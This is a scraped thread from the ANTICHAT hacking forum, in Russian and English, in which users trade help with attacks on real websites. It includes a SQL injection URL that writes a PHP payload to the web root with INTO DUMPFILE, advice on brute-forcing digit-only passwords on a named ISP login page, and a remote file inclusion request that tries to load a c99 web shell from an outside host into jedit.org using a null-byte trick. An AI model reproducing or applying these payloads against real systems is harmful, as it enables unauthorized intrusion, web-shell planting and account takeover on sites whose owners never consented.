ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Hi,
Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.

e.g:

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/'/var/www'/*

Works!

But

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/0x2f7661722f777777/*

doesn work!

Is there a possibility to dump files, if magic_quotes_gpc ist switched on?

Thank you.

Вот нашел похожее
даже круче
http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/

2Lidloses_Auge
No, this construction does not work without the quotes, hex-encoding does not help

__________________
Карфаген должен быть разрушен...

Всем привет.
Подскажите плз как настроить брутфорс доля взлома такой вот байды
http://stat.corbina.com.ua/

Известен ник и известно что пароль только цыфры. Просьба помочь-долбался ничего не выходит .

А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р

Warning: main(http://site/RamShellc99.php\0.html): failed to open stream: Connection refused in /home/groups/j/je/jedit/htdocs/index.php on line 63

Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

Имеется запрос:

http://www.jedit.org/index.phppage=http://site/RamShellc99.php%00

В результате получается такое :

Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

Я так понял,тут две веши:

1.У меня жутко кривые куриные лапы.
2.Фильтрация %0 на \
3.Какие-то проблемы с url- encoding ( ??? )

В данном случае, меня интересует , почему не заливается шелл =(. Про инклуды аля ../../../../../etc/pwd пожалуйста не надо)

Некоторые мысли...

Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.

По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)

Может я ща чё ляпну, но шеллкод разве может исполняться в любом файле ? (шеллкод системная с*ка ) Мошь он просто выдаёт несоответствие расширений, и потому не исполняет. Ждём-с мнение экспертов ).

include($page.php) зло (